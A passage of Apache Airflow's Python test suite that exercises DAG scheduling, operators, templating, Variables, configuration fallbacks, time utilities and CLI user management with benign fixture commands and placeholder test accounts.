synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
schedule_interval=delta)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(self.TEST_SCHEDULE_ONCE_DAG_ID)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
start_date=start_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
w[0].message.args[0])
def test_illegal_args_forbidden(self):
"""
Tests that operators raise exceptions on illegal arguments when
illegal arguments are not allowed.
"""
with conf_vars({('operators', 'allow_illegal_arguments'): 'False'}):
with self.assertRaises(AirflowException) as ctx:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
str(ctx.exception))
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(_, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
'{\n "foo": "bar"\n}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'fernet_key'): None}):
with self.assertRaises(AirflowConfigException) as cm:
conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)), '\u1000foo')
self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object): # pylint: disable=unused-argument
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date, utc_now)
def test_trigger_dagrun_with_str_execution_date(self):
utc_now_str = timezone.utcnow().isoformat()
self.assertIsInstance(utc_now_str, (str,))
run_id = 'trig__' + utc_now_str
def payload_generator(context, object): # pylint: disable=unused-argument
object.run_id = run_id
return object
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now_str,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date.isoformat(), utc_now_str)
def test_trigger_dagrun_with_templated_execution_date(self):
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
execution_date='{{ execution_date }}',
dag=self.dag)
self.assertTrue(isinstance(task.execution_date, str))
self.assertEqual(task.execution_date, '{{ execution_date }}')
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.render_templates()
self.assertEqual(timezone.parse(task.execution_date), DEFAULT_DATE)
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class TestCli(unittest.TestCase):
TEST_USER1_EMAIL = 'test-user1@example.com'
TEST_USER2_EMAIL = 'test-user2@example.com'
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._cleanup()
def setUp(self):
super().setUp()
from airflow.www import app as application
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
for email in [self.TEST_USER1_EMAIL, self.TEST_USER2_EMAIL]:
test_user = self.appbuilder.sm.find_user(email=email)
if test_user:
self.appbuilder.sm.del_register_user(test_user)
for role_name in ['FakeTeamA', 'FakeTeamB']:
if self.appbuilder.sm.find_role(role_name):
self.appbuilder.sm.delete_role(role_name)
super().tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(Pool).delete()
session.query(Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['dags', 'list', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'dags', 'trigger', 'example_bash_operator', ]))
args = self.parser.parse_args(['dags', 'list_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test'
])
cli.users_create(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
args = self.parser.parse_args([
'users', 'delete', '--username', 'test3',
])
cli.users_delete(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', 'create', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users_create(args)
